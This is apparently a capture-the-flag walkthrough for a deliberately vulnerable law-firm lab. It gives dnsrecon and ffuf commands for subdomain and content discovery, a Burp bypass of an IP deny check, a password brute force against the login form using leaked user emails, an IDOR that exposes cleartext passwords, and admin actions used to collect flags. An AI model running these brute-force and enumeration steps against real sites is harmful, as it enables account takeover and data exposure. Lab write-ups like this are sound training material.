- Subdomain discovery (wordlist brute force with dnsrecon):
  dnsrecon -d vulnlawyers.co.uk -D ~/wordlists/subdomains.txt -t brt
- Found:
  data.vulnlawyers.co.uk
  www.vulnlawyers.co.uk
- Searched crt.sh (certificate transparency logs) for other hosts under vulnlawyers.co.uk: nothing found. That only rules out names with a publicly logged certificate, so the brute-force results above are the working list.
- Accessing data.vulnlawyers.co.uk in the browser shows Flag 1.
- Content discovery on data.vulnlawyers.co.uk (-mc all -fc 404 shows every response except 404s; the ctfchallenge cookie ties the requests to the player's session):
ffuf -w ~/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://data.vulnlawyers.co.uk/FUZZ -mc all -fc 404
- Visited /users/ and found user data, including email addresses: Flag 3. The addresses raised the question of whether a mail server was running; it was not.
- Content discovery on www.vulnlawyers.co.uk
ffuf -w ~/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://www.vulnlawyers.co.uk/FUZZ -mc all -fc 404
- Visited /login in the browser, but it redirected to /denied, a page showing the error "Access is denied from your IP address".
- Visited /login again through the Burp proxy and the page loaded: Flag 2. The same client got a different answer when proxied, so the deny check presumably depends on something in the request rather than on the true source address.
- Visited /lawyers-only through Burp; it redirected to /lawyers-only-login, a login portal.
- The data.vulnlawyers.co.uk/users API found earlier gives a list of email addresses, so their passwords can be brute-forced against the login form. Trying the first user (one request at a time with a 0.1 s pause; -fc 401 hides the wrong-password responses, so anything that is printed is a hit):
  ffuf -w ~/wordlists/passwords.txt -t 1 -p 0.1 -X POST -d "email=marsha.blankenship%40vulnlawyers.co.uk&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://www.vulnlawyers.co.uk/lawyers-only-login -mc all -fc 401
- Tried each user in turn until one worked: logged in with [email protected] and summer as username and password. Flag 4.
- Browsed the site to see what it does. Found a /lawyers-only-profile/ page whose page source contains a link to a profile-details URL.
- Visited /lawyers-only-profile-details/4: the page reveals that user's password in clear text, and because the numeric id is taken straight from the URL with no ownership check, it is an IDOR.
- Tried other ids; /lawyers-only-profile-details/2 gave Flag 5.
- The user shayne.cairns appears to be an admin, since that account can delete a case.
- The last flag appeared after deleting the case with the admin account: Flag 6.